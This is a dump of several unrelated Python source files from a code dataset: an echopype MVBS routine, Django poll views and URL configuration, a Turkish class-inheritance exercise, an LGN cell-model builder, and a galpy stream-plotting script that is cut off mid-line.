MVBS\n final = np.empty((n_bin_time, n_bin_er - 1))\n for bin_time in range(1, n_bin_time + 1):\n # obtain er_mean indices corresponding to the time bin\n indices = np.argwhere(bin_time_ind == bin_time).flatten()\n\n if len(indices) == 0:\n # fill values with NaN, if there are no values in the bin\n final[bin_time - 1, :] = np.nan\n else:\n # bin and mean the er_mean time bin\n final[bin_time - 1, :] = np.nanmean(er_means[:, indices], axis=1)\n\n return final\n\n\ndef get_MVBS_along_channels(\n ds_Sv: xr.Dataset, echo_range_interval: np.ndarray, ping_interval: np.ndarray\n) -> np.ndarray:\n \"\"\"\n Computes the MVBS of ``ds_Sv`` along each channel for the given\n intervals.\n\n Parameters\n ----------\n ds_Sv: xr.Dataset\n A Dataset containing ``Sv`` and ``echo_range`` data with coordinates\n ``channel``, ``ping_time``, and ``range_sample``\n echo_range_interval: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``echo_range``\n ping_interval: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``ping_time``\n\n Returns\n -------\n np.ndarray\n The MVBS value of the input ``ds_Sv`` for all channels\n\n Notes\n -----\n If the values in ``ds_Sv`` are delayed then the binning and mean of ``Sv`` with\n respect to ``echo_range`` will take place, then the delayed result will be computed,\n and lastly the binning and mean with respect to ``ping_time`` will be completed. It\n is necessary to apply a compute midway through this method because Dask graph layers\n get too large and this makes downstream operations very inefficient.\n \"\"\"\n\n all_MVBS = []\n for chan in ds_Sv.channel:\n # squeeze to remove \"channel\" dim if present\n # TODO: not sure why not already removed for the AZFP case. Investigate.\n ds = ds_Sv.sel(channel=chan).squeeze()\n\n # average should be done in linear domain\n sv = 10 ** (ds[\"Sv\"] / 10)\n\n # get MVBS for channel in linear domain\n chan_MVBS = bin_and_mean_2d(\n sv.data,\n bins_time=ping_interval,\n bins_er=echo_range_interval,\n times=sv.ping_time.data,\n echo_range=ds[\"echo_range\"],\n comprehensive_er_check=True,\n )\n\n # apply inverse mapping to get back to the original domain and store values\n all_MVBS.append(10 * np.log10(chan_MVBS))\n\n # collect the MVBS values for each channel\n return np.stack(all_MVBS, axis=0)\n","sub_path":"echopype/commongrid/mvbs.py","file_name":"mvbs.py","file_ext":"py","file_size_in_byte":16115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"193313510","text":"import hashlib\nfrom builtins import super\nimport datetime\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\nfrom .models import Question, Choice\nfrom django.http import Http404\nfrom django.urls import reverse\nfrom django.views import generic\nfrom django.utils import timezone\nfrom django.db.models import Count\nfrom .forms import AddQuestionForm, ChoiceFormSet\nfrom django.forms import formset_factory\nfrom django.utils.http import is_safe_url\nfrom django.views.decorators.cache import cache_page\n\n\n\n\n\n# Create your views here.\n'''\ndef index(request):\n latest_question_list = Question.objects.order_by('-pub_date')[:5]\n #print(latest_question_list) #printuje na serwerze co się dzieje\n template = 
loader.get_template('polls/index.html')\n context = {\n 'latest_question_list': latest_question_list,\n }\n #return HttpResponse(template.render(context,request))\n return render(request, 'polls/index.html', context)\n\n\ndef detail(request, question_id):\n # try:\n # question = Question.objects.get(id=question_id)\n # except Question.DoesNotExist:\n # raise Http404(\"Question does not exist\")\n ### get_object_or_404 to to samo co u góry tylko lepsze\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/detail.html', {'question': question})\n #return HttpResponse(\"You're looking at question %s.\" % question_id)\n\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/results.html', {'question': question})\n'''\n\n#new way with views\n\nclass IndexView(generic.ListView):\n paginate_by = 5\n template_name = 'polls/index.html' #Similarly, the ListView generic view uses a default template called /_list.html;\n # we use template_name to tell ListView to use our existing \"polls/index.html\" template.\n #context_object_name = 'latest_question_list' #context_object_name attribute, specifying that we want to use latest_question_list instead.\n #thats why we know what name to use in .html file\n #otherwise it would be named \"object_list\"\n\n\n def get_queryset(self): # defines how the querryset will be created, we override it to write 5 questions, not all form DB\n \"\"\"Return the last five published questions.\n\n if we wanna chenge the context #context = super().get_context_data(**kwargs) ### in this case super() referse to parent classes in a\n we need to remember (if needed) to get context from parents class\n \"\"\"\n # we return 5 latests questions which date is allready released\n if self.request.user.is_authenticated:\n return Question.objects.filter(pub_date__lte=timezone.now()).annotate(choice_count=Count('choice')).filter(choice_count__gte=1).order_by('-pub_date')\n else:\n return []\n\n #pub_date__lte <- \"less then or equal to\" && number of choices greater than or equal to 1\n\n\n # to use different context we overload the get_context_data method\n def get_context_data(self, **kwargs):\n # Call the base implementation first to get the context\n context = super().get_context_data(**kwargs)\n\n # Number of visits to this view, as counted in the session variable.\n num_visits = self.request.session.get('num_visits', 0)\n self.request.session['num_visits'] = num_visits + 1\n # Create any data and add it to the context\n context['num_visits'] = num_visits\n return context\n\n\n\n\nclass DetailView(LoginRequiredMixin,generic.DetailView): #used to let to this URL only logged in users\n # redirect_field_name = 'redirect_to' #uf we want to redirect it to different URL\n model = Question\n template_name = 'polls/detail.html' # DetailView generic view uses a template called /_detail.html.\n # In our case, it would use the template \"polls/question_detail.html\". 
The template_name attribute is used to tell\n # Django to use a specific template name instead of the autogenerated default template name.\n\n #@property #turns the function into \"getter\" - read-only atrubite\n def get_queryset(self):\n \"\"\"\n Excludes any questions that aren't published yet.\n \"\"\"\n return Question.objects.filter(pub_date__lte=timezone.now()) # it is DetailView thats why we dont use\n # choice_set because we allready have object\n\n\nclass ResultsView(generic.DetailView):\n model = Question\n template_name = 'polls/results.html'\n\n# used for function based views\n@login_required #with this decorator (func which gets func as argument) lets logged users to use this function, if not they will be transsfered to login page\ndef vote(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = question.choice_set.get(pk=request.POST['choice']) #request.POST dostaję request typu post bo ktoś kliknął w guzik\n # <- this in html\n # dictionary-like object that lets you access submitted data by key name\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(request, 'polls/detail.html', {\n 'question': question,\n 'error_message': \"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))\n # HttpResponseRedirect takes a single argument: the URL to which the user will be redirected\n # you should always return an HttpResponseRedirect after successfully dealing with POST data.\n # This tip isn’t specific to Django; it’s good Web development practice in general.\n\n #redirect helps to avoid hardcoding URL , given name where we want to pass controll and arguments\n\n#The add question process will be writing to our database, so, by convention, we use the POST request approach.\n# for class based view we need PermisionRequiredMixin and variable permission_required = 'catalog.can_mark_returned'\n@permission_required('question.can_add_question')\ndef AddQuestion(request):\n # If this is a POST request then process the Form data\n\n \"\"\"ChoiceFormSet = formset_factory(ChoiceForm, formset=BaseChoiceFormSet, max_num=10, validate_max=True,\n min_num=2, validate_min=True, can_delete=True)\"\"\"\n\n if request.method == 'POST':\n print('\\n\\n',request.POST,'\\n\\n',request.POST.get('csrfmiddlewaretoken').encode('utf-8'),'\\n\\n',request.session,'\\n\\n')\n\n # Create a form instance and populate it with data from the request (binding):\n form = AddQuestionForm(request.POST)\n\n ChoicesFormset = ChoiceFormSet(request.POST) #request.FILES for files upload handling\n\n # hashstring = hashlib.sha1(request.POST.get('csrfmiddlewaretoken').encode('utf-8')) ## This is going to be unique\n # if request.session.get('sesionform') != hashstring:\n # Check if the form is valid:\n if form.is_valid() and ChoicesFormset.is_valid():\n question_instance = Question(question_text = form.cleaned_data['question_text'],\\\n pub_date = form.cleaned_data['pub_date'])\n question_instance.save()\n\n print('print all ChoicesFormset')\n print(ChoicesFormset)\n for answer in ChoicesFormset:\n print('rpint jeden test')\n print(answer)\n choice_instance = Choice(question = question_instance, choice_text = answer.cleaned_data['choice_text'])\n 
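The AddQuestion view around this point validates the question form and the choice formset together and writes rows only if every form passes. A framework-free sketch of that all-or-nothing pattern, with FakeForm standing in for Django's bound forms:

# All-or-nothing save pattern from AddQuestion, framework-free for clarity:
# validate the main form and every sub-form, persist only if all are valid.
class FakeForm:
    def __init__(self, data, ok=True):
        self.cleaned_data, self._ok = data, ok
    def is_valid(self):
        return self._ok

def save_question_with_choices(question_form, choice_forms, saved):
    forms = [question_form, *choice_forms]
    if not all(f.is_valid() for f in forms):
        return False  # nothing persisted; caller re-renders with errors
    saved.append(('question', question_form.cleaned_data))
    for cf in choice_forms:  # one Choice row per valid sub-form
        saved.append(('choice', cf.cleaned_data))
    return True

rows = []
ok = save_question_with_choices(
    FakeForm({'question_text': 'Best editor?'}),
    [FakeForm({'choice_text': 'vim'}), FakeForm({'choice_text': 'emacs'})],
    rows)
print(ok, rows)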
choice_instance.save()\n\n #check if redirect URL is safe\n print(is_safe_url(reverse('polls:index'),allowed_hosts=None))\n # redirect to a new URL:\n return HttpResponseRedirect(reverse('polls:index'))\n\n # If this is a GET (or any other method) create the default form.\n else:\n form = AddQuestionForm()\n ChoicesFormset = ChoiceFormSet()\n\n\n context = {\n 'form': form,\n 'choices': ChoicesFormset,\n #'question_instance': question_instance,\n }\n\n return render(request, 'polls/AddQuestion.html', context)","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321995086","text":"class Tasit():\n\n tasit_sayisi = 0\n __tasitlarim = []\n\n def __init__(self, motor_gucu, koltuk_sayisi, km_durumu, modeli, satis_yili, tekerlek_sayisi = 4):\n self.motor_gucu = motor_gucu\n self.koltuk_sayisi = koltuk_sayisi\n self.km_durumu = km_durumu\n self.modeli = modeli\n self.satis_yili = satis_yili\n self.tekerlek_sayisi = tekerlek_sayisi\n Tasit.__tasitlarim.append(self)\n\n @classmethod\n def tasit_miktari_goruntule(cls):\n return len(cls.__tasitlarim)\n\n def koltuksayisi(self):\n print(\"Aracin koltuk sayisi : \", tasit1.koltuk_sayisi)\n\n def model_goster(self):\n print(\"Aracin modeli : \", tasit1.modeli)\n\n def kmdurumu(self):\n print(\"Aracin km'si : \", tasit1.km_durumu)\n\n def tasit_miktari_guncelle(self):\n Tasit.tasit_sayisi += 1\n print(\"Mevcut arac sayisi : \", Tasit.tasit_sayisi)\n\n\nclass Araba(Tasit):\n\n def __init__(self, motor_gucu, koltuk_sayisi, km_durumu, modeli, satis_yili, max_hiz):\n super().__init__(motor_gucu, koltuk_sayisi, km_durumu, modeli, satis_yili)\n self.max_hiz=max_hiz\n\n def arabayi_durdur(self):\n print(\"Araba durdu\")\n\n def gaza_bas(self):\n print(\"Araba hizlaniyor\")\n\n def arabayi_yavaslat(self):\n print(\"Araba yavasliyor\")\n\n def arabanin_durumunu_goster(self):\n if issubclass(Araba,Tasit):\n print(\"Bu sinif 'Tasit' sinifindan miras alinmistir\")\n else:\n print(\"Araba sinifi 'Tasit' sinifindan miras alinMAmistir\")\n\n def model_goster(self):\n print(\"Araba sinifinin methodu…\")\n super().model_goster()\n\ntasit1 = Tasit(1600, 6, 76825, 2016, 2018)\naraba1 = Araba(1600, 6, 76825, 2016, 2018, 340)\n\n\n\n\nprint(\"\"\"Lutfen yapmak istediginiz islemi seciniz\\n\n Koltuk sayisini gorme 1\n Tasitin modelini gorme 2\n Tasitin km'sini gorme 3\n Tasit miktarini guncelle 4\n Arabayi durdur 5\n Arabayi hizlandir 6\n Arabayi yavaslat 7\n Arabanin modelini goster 8\n Arabanin durumunu goster 9\n\"\"\")\n\nwhile True:\n\n islem = input(\"\\nLutfen yapmak istediginiz islemi seciniz : \")\n\n if islem == \"1\":\n koltuk = tasit1.koltuk_sayisi\n tasit1.koltuksayisi()\n\n elif islem == \"2\":\n model = tasit1.modeli\n tasit1.model_goster()\n\n elif islem == \"3\":\n km = tasit1.km_durumu\n tasit1.kmdurumu()\n\n elif islem == \"4\":\n tasit1.tasit_miktari_guncelle()\n\n elif islem == \"5\":\n araba1.arabayi_durdur()\n\n elif islem == \"6\":\n araba1.gaza_bas()\n\n elif islem == \"7\":\n araba1.arabayi_yavaslat()\n\n elif islem == \"8\":\n araba1.model_goster()\n\n elif islem == \"9\":\n araba1.arabanin_durumunu_goster()\n","sub_path":"05.09.19_odev.py","file_name":"05.09.19_odev.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"362379547","text":"\"\"\"reroll URL Configuration\n\nThe `urlpatterns` list routes URLs to 
views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include\nfrom django.conf import settings\nfrom django.views.generic import TemplateView\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view as get_yasg_schema_view\nfrom drf_yasg import openapi\n\nyasg_schema_view = get_yasg_schema_view(\n openapi.Info(\n title=\"REROLL API\",\n default_version='v1',\n description=\"API for REROLL application\",\n terms_of_service=\"/terms\",\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path('', TemplateView.as_view(template_name=\"index.html\")),\n\n # admin panel\n path('admin/', admin.site.urls),\n\n # django-allauth urls\n path(r'accounts/', include('allauth.urls')),\n\n # api\n path('api/v1/', include('webapi.urls')),\n]\n\ninternal_apis = []\n\nurlpatterns += internal_apis\n\nif settings.DEBUG:\n urlpatterns += [\n re_path(r'^swagger(?P\\.json|\\.yaml)$', yasg_schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path(r'swagger/', yasg_schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n ]\n","sub_path":"backend/reroll/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"56550143","text":"import scipy.io as sio\nimport os \nimport matplotlib.pyplot as plt\nimport isee_engine.nwb as nwb\nfrom linearfilter import SpatioTemporalFilter\nimport numpy as np \nfrom spatialfilter import GaussianSpatialFilter\nfrom transferfunction import ScalarTransferFunction\nfrom temporalfilter import TemporalFilterCosineBump\nfrom cursor import LNUnitCursor, MultiLNUnitCursor\nfrom movie import Movie \nfrom lgnmodel1 import LGNModel, heat_plot\nfrom cellmodel import LGNOnCell, LGNOffCell,LGNOnOffCell,TwoSubfieldLinearCell, OnUnit, OffUnit\nfrom transferfunction import MultiTransferFunction, ScalarTransferFunction\nfrom lnunit import LNUnit, MultiLNUnit \nfrom sympy.abc import x as symbolic_x\nfrom sympy.abc import y as symbolic_y\nfrom kernel import Kernel3D\nfrom movie import Movie, FullFieldFlashMovie\nimport itertools\nimport scipy.stats as sps\n\n# def multi_cell_tensor_generator(cell_creation_function, **kwargs):\n# \n# sew_param_dict = {}\n# static_param_dict = {}\n# for key, val in kwargs.items():\n# if isinstance(val, (list, np.ndarray)):\n# sew_param_dict[key]=val\n# else:\n# static_param_dict[key]=val\n# \n# cell_list = []\n# loop_keys, loop_lists = zip(*sew_param_dict.items())\n# for param_tuple in itertools.product(*loop_lists): \n# param_dict = dict(zip(loop_keys, param_tuple))\n# print param_dict\n# param_dict.update(static_param_dict)\n# cell_list += cell_creation_function(**param_dict)\n# \n# return cell_list\n\ndef multi_cell_random_generator(cell_creation_function=None, **kwargs):\n \n sew_param_dict = {}\n static_param_dict = {}\n range_key_dict = {}\n for key, val in kwargs.items():\n if isinstance(val, 
(sps.rv_continuous, sps.rv_discrete)) or type(val) == type(sps.multivariate_normal()):\n sew_param_dict[key]=val\n elif isinstance(val, np.ndarray): \n range_key_dict[key] = val\n else:\n static_param_dict[key]=val\n \n number_of_cells = static_param_dict.pop('number_of_cells', 1)\n \n for key, val in range_key_dict.items():\n assert len(val) == number_of_cells\n \n cell_list = []\n loop_keys, loop_lists = zip(*sew_param_dict.items())\n value_instance_list = zip(*map(lambda x: x.rvs(size=number_of_cells), loop_lists))\n for ii, curr_value_instance in enumerate(value_instance_list):\n param_dict = dict(zip(loop_keys, curr_value_instance))\n param_dict.update(static_param_dict)\n param_dict['number_of_cells'] = 1\n for range_key in range_key_dict:\n param_dict[range_key] = range_key_dict[range_key][ii]\n \n if cell_creation_function is None:\n cell_list.append(param_dict)\n else:\n cell_list += cell_creation_function(**param_dict)\n \n return cell_list\n \n \ndef make_single_unit_cell_list(number_of_cells=None,\n lattice_unit_center=None,\n weights=None,\n kpeaks=None,\n delays=None,\n amplitude=None,\n sigma=None,\n width=5,\n transfer_function_str = 'Heaviside(s)*s'):\n\n cell_list = []\n for _ in range(number_of_cells):\n dxi = np.random.uniform(-width*1./2,width*1./2)\n dyi = np.random.uniform(-width*1./2,width*1./2)\n temporal_filter = TemporalFilterCosineBump(weights, kpeaks,delays)\n spatial_filter = GaussianSpatialFilter(translate=(dxi,dyi), sigma=sigma, origin=lattice_unit_center) # all distances measured from BOTTOM LEFT\n spatiotemporal_filter = SpatioTemporalFilter(spatial_filter, temporal_filter, amplitude=amplitude)\n transfer_function = ScalarTransferFunction(transfer_function_str)\n if amplitude > 0.:\n cell = OnUnit(spatiotemporal_filter, transfer_function)\n elif amplitude < 0.:\n cell = OffUnit(spatiotemporal_filter, transfer_function) \n else:\n raise Exception\n \n \n cell_list.append(cell)\n \n return cell_list\n\ndef make_on_off_cell_list(number_of_cells=None,\n lattice_unit_center=None,\n weights_on=None,\n weights_off=None,\n kpeaks_on=None,\n kpeaks_off=None,\n delays_on = None,\n delays_off = None,\n amplitude_on=None,\n amplitude_off=None,\n sigma_on=None,\n sigma_off=None,\n subfield_separation=None,\n ang=None,\n dominant_subunit=None,\n width=5,\n transfer_function_str = 'Heaviside(x)*x + Heaviside(y)*y'):\n\n cell_list = []\n for _ in range(number_of_cells):\n \n dxi = np.random.uniform(-width*1./2,width*1./2)\n dyi = np.random.uniform(-width*1./2,width*1./2)\n \n dominant_subfield_location = (lattice_unit_center[0]+dxi, lattice_unit_center[1]+dyi)\n# hor_offset = np.cos(ang*np.pi/180.)*subfield_separation\n# vert_offset = np.sin(ang*np.pi/180.)*subfield_separation\n# nondominant_subfield_translation = (hor_offset,vert_offset)\n \n if dominant_subunit == 'on': \n on_translate = dominant_subfield_location#(0,0)\n off_translate = dominant_subfield_location#nondominant_subfield_translation\n \n elif dominant_subunit == 'off':\n \n off_translate = dominant_subfield_location#(0,0)\n on_translate = dominant_subfield_location#nondominant_subfield_translation\n \n else:\n raise Exception\n \n on_origin = off_origin = (0,0)#dominant_subfield_location\n\n temporal_filter_on = TemporalFilterCosineBump(weights_on, kpeaks_on,delays_on)\n spatial_filter_on = GaussianSpatialFilter(translate=on_translate,sigma=sigma_on, origin=on_origin) # all distances measured from BOTTOM LEFT\n on_filter = SpatioTemporalFilter(spatial_filter_on, temporal_filter_on, 
amplitude=amplitude_on)\n \n temporal_filter_off = TemporalFilterCosineBump(weights_off, kpeaks_off,delays_off)\n spatial_filter_off = GaussianSpatialFilter(translate=off_translate,sigma=sigma_off, origin=off_origin) # all distances measured from BOTTOM LEFT\n off_filter = SpatioTemporalFilter(spatial_filter_off, temporal_filter_off, amplitude=amplitude_off)\n\n# cell = LGNOnOffCell(on_filter, off_filter, transfer_function=MultiTransferFunction((symbolic_x, symbolic_y), transfer_function_str))\n cell = TwoSubfieldLinearCell(on_filter,off_filter,subfield_separation=subfield_separation, onoff_axis_angle=ang, dominant_subfield_location=dominant_subfield_location)\n cell_list.append(cell)\n \n return cell_list\n\n# amplitude_list = amplitude_dist.rvs(size=5)\n# kpeak_list = kpeak_dist.rvs(size=5)\n# cell_config = {'number_of_cells':5,\n# 'lattice_unit_center':(40,30),\n# 'weights':(.4,-.2),\n# 'kpeaks':kpeak_list,\n# 'amplitude':amplitude_list,\n# 'sigma':(4,4),\n# 'width':5}\n# multi_cell_tensor_generator(make_single_unit_cell_list, **cell_config)\n\n\n# amplitude_dist = sps.rv_discrete(values=([20,25], [.5,.5]))\n# kpeak_dist = sps.multivariate_normal(mean=[40., 80.], cov=[[5.0, 0], [0, 5]])\n# \n# single_unit_cell_config = {'number_of_cells':10,\n# 'lattice_unit_center':(40,30),\n# 'weights':(.4,-.2),\n# 'kpeaks':kpeak_dist,\n# 'amplitude':amplitude_dist,\n# 'sigma':(4,4),\n# 'width':5}\n# \n# \n# amplitude_on_dist = sps.rv_discrete(values=([20,25], [.5,.5]))\n# amplitude_off_dist = sps.rv_discrete(values=([-10,-15], [.5,.5]))\n# kpeak_on_dist = sps.multivariate_normal(mean=[40., 80.], cov=[[5.0, 0], [0, 5]])\n# kpeak_off_dist = sps.multivariate_normal(mean=[100., 160.], cov=[[5.0, 0], [0, 5]])\n# #ang_dist = sps.rv_discrete(values=(np.arange(0,360,45), 1./8*np.ones((1,8))))\n# ang_dist = np.arange(0,360,45)\n# \n# two_unit_cell_config={'number_of_cells':8,\n# 'lattice_unit_center':(40,30),\n# 'weights_on':(.4,-.2),\n# 'weights_off':(.4,-.1),\n# 'kpeaks_on':kpeak_on_dist,\n# 'kpeaks_off':kpeak_off_dist,\n# 'amplitude_on':20.,\n# 'amplitude_off':-10.,\n# 'sigma_on':(4,4),\n# 'sigma_off':(4,4),\n# 'subfield_separation':2.,\n# 'ang':ang_dist,\n# 'dominant_subunit':'on',\n# 'width':5}\n\n \ndef evaluate_cell_and_plot(input_cell, input_movie, ax, show=False):\n t, y = input_cell.evaluate(input_movie,downsample = 10)\n ax.plot(t, y)\n \n if show == True:\n plt.show()\n \n \n# if __name__ == \"__main__\":\n# \n# # Create stimulus 0:\n# frame_rate = 60\n# m1 = FullFieldFlashMovie(np.arange(60), np.arange(80), 1., 3., frame_rate=frame_rate).full(t_max=3)\n# m2 = FullFieldFlashMovie(np.arange(60), np.arange(80), 0, 2, frame_rate=frame_rate, max_intensity=-1).full(t_max=2)\n# m3 = FullFieldFlashMovie(np.arange(60), np.arange(80), 0, 2., frame_rate=frame_rate).full(t_max=2)\n# m4 = FullFieldFlashMovie(np.arange(60), np.arange(80), 0, 2, frame_rate=frame_rate, max_intensity=0).full(t_max=2)\n# m0 = m1+m2+m3+m4\n# \n# # Create stimulus 1:\n# movie_file = '/data/mat/RamIyer/for_Anton/grating_ori0_res2.mat'\n# m_file = sio.loadmat(movie_file)\n# m_data_raw = m_file['mov_fine'].T\n# m_data = np.reshape(m_data_raw,(3000,64,128))\n# m1 = Movie(m_data, frame_rate=1000.)\n# \n# #Create stimulus 2:\n# movie_file = '/data/mat/iSee_temp_shared/TouchOfEvil_norm.npy'\n# m_data = np.load(movie_file, 'r')\n# m = Movie(m_data[1000:], frame_rate=30.)\n# \n# movie_list = [m0, m1, m2]\n# \n# #====================================================\n# \n# #Create cell list\n# \n# cell_list = []\n# \n# #On cells\n# params_tON 
= (5, (40,30), (.4,-.2),(40,80),20.,(4,4))\n# tON_list = make_single_unit_cell_list(*params_tON)\n# cell_list.append(tON_list)\n# \n# params_sON = (5, (40,30), (.4,-.1),(100,160),20.,(4,4))\n# sON_list = make_single_unit_cell_list(*params_sON)\n# cell_list.append(sON_list)\n# \n# #Off cells\n# params_tOFF = (5, (40,30), (.4,-.2),(40,80),-20.,(4,4))\n# tOFF_list = make_single_unit_cell_list(*params_tOFF)\n# cell_list.append(tOFF_list)\n# \n# params_sOFF = (5, (40,30), (.4,-.1),(100,160),-20.,(4,4))\n# sOFF_list = make_single_unit_cell_list(*params_sOFF)\n# cell_list.append(sOFF_list)\n# \n# #ONOFF cells\n# params_onoff = (5, (40,30),(.4, -.2),(.4,-.2),(40, 80),(50,100),20.,-20.,(4,4),(4,4),2.,0,'on')\n# onoff_list = make_on_off_cell_list(*params_onoff)\n# cell_list.append(onoff_list)\n# \n# #Two subunit cells\n# params_twosub = (5, (40,30),(.4, -.2),(.4,-.1),(40, 80),(100,160),20.,-10.,(4,2),(3,4),10.,90,'on')\n# twosub_list = make_on_off_cell_list(*params_twosub)\n# cell_list.append(twosub_list)\n# \n# #=====================================================\n# #Evaluate and plot responses\n# nc = len(movie_list)\n# nr = len(cell_list)\n# fig, axes = plt.subplots(nr,nc+2) \n# \n# for curr_row, curr_cell in zip(axes, cell_list):\n# curr_cell.show_spatial_filter(np.arange(60),np.arange(80), ax=curr_row[0], show=False, colorbar=False)\n# curr_cell.show_temporal_filter(ax=curr_row[1], show=False)\n# \n# for curr_row, curr_cell in zip(axes, cell_list):\n# for curr_ax, curr_movie in zip(curr_row[2:], movie_list):\n# evaluate_cell_and_plot(curr_cell, curr_movie, curr_ax, show=False)\n# \n# plt.tight_layout() \n# plt.show()\n","sub_path":"bmtk/simulator/filternet/lgnmodel/make_cell_list.py","file_name":"make_cell_list.py","file_ext":"py","file_size_in_byte":12310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"456873284","text":"import sys\nimport numpy\nfrom galpy.util import bovy_plot, bovy_conversion\nfrom galpy import potential\nfrom galpy.orbit import Orbit\nfrom galpy.actionAngle_src.actionAngleIsochroneApprox\\\n import actionAngleIsochroneApprox\nfrom galpy.df_src.streamdf import streamdf\nfrom matplotlib import pyplot\n_NTRACKCHUNKS= 4\n_SIGV=0.365\ndef illustrate_track(plotfilename1,plotfilename2,plotfilename3):\n #Setup stream model\n lp= potential.LogarithmicHaloPotential(q=0.9,normalize=1.)\n aAI= actionAngleIsochroneApprox(b=0.8,pot=lp)\n obs= numpy.array([1.56148083,0.35081535,-1.15481504,\n 0.88719443,-0.47713334,0.12019596])\n sdf= streamdf(_SIGV/220.,progenitor=Orbit(obs),pot=lp,aA=aAI,\n leading=True,nTrackChunks=_NTRACKCHUNKS,\n tdisrupt=4.5/bovy_conversion.time_in_Gyr(220.,8.))\n #First calculate meanOmega and sigOmega\n mOs= numpy.array([sdf.meanOmega(t,oned=True) for t in sdf._thetasTrack])\n sOs= numpy.array([sdf.sigOmega(t) for t in sdf._thetasTrack])\n mOs-= sdf._progenitor_Omega_along_dOmega\n mOs*= -bovy_conversion.freq_in_Gyr(220.,8.)\n sOs*= bovy_conversion.freq_in_Gyr(220.,8.)\n progAngle= numpy.dot(sdf._progenitor_angle,sdf._dsigomeanProgDirection)\n bovy_plot.bovy_print(fig_width=8.25,fig_height=3.5)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs,'ko',ms=8.,\n xlabel=r'$\\theta_\\parallel$',\n ylabel=r'$\\Omega_\\parallel\\,(\\mathrm{Gyr}^{-1})$',\n xrange=[-0.2-1.14,1.6-1.14],\n yrange=[22.05,22.55])\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs,'k-',lw=1.5,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,\n mOs[0]*numpy.ones(len(sdf._thetasTrack))+0.03,\n 
'ko',ls='--',dashes=(20,10),lw=1.5,overplot=True,\n ms=6.)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs+2*sOs,'ko',ms=6.,mfc='none',\n zorder=1,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs-2*sOs,'ko',ms=6.,mfc='none',\n zorder=1,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs+2*sOs,'k-.',lw=1.5,\n zorder=0,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs-2*sOs,'k-.',lw=1.5,\n zorder=0,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,sdf._progenitor_Omega_along_dOmega*bovy_conversion.freq_in_Gyr(220.,8.)*numpy.ones(len(sdf._thetasTrack)),\n 'k--',lw=1.5,overplot=True)\n bovy_plot.bovy_plot((sdf._thetasTrack+progAngle)[0],(sdf._progenitor_Omega_along_dOmega*bovy_conversion.freq_in_Gyr(220.,8.)*numpy.ones(len(sdf._thetasTrack)))[0],\n 'ko',ms=6.,overplot=True)\n bovy_plot.bovy_text(1.05+progAngle,22.475,r'$\\mathrm{progenitor\\ orbit}$',size=16.)\n bovy_plot.bovy_text(progAngle+0.05,22.50,r'$\\mathrm{current\\ progenitor\\ position}$',size=16.)\n bovy_plot.bovy_plot([progAngle+0.05,progAngle],[22.50,sdf._progenitor_Omega_along_dOmega*bovy_conversion.freq_in_Gyr(220.,8.)],'k:',overplot=True)\n bovy_plot.bovy_text(-1.2,22.35,r\"$\\mathrm{At\\ the\\ progenitor's}\\ \\theta_{\\parallel}, \\mathrm{we\\ calculate\\ an\\ auxiliary\\ orbit\\ through}$\"+'\\n'+r\"$(\\mathbf{x}_a,\\mathbf{v}_a) = (\\mathbf{\\Omega}_p+\\Delta \\mathbf{\\Omega}^m,\\boldsymbol{\\theta}_p)\\ \\mathrm{using\\ a\\ linearized}\\ (\\mathbf{\\Omega},\\boldsymbol{\\theta})\\ \\mathrm{to}\\ (\\mathbf{x},\\mathbf{v}).$\",size=16.)\n yarcs= numpy.linspace(22.30,22.39,101)\n bovy_plot.bovy_plot(sdf._thetasTrack[0]+progAngle-0.1*numpy.sqrt(1.-(yarcs-22.35)**2./0.05**2.),yarcs,'k:',\n overplot=True)\n bovy_plot.bovy_text(-1.3,22.07,r'$\\mathrm{At\\ a\\ small\\ number\\ of\\ points, we\\ 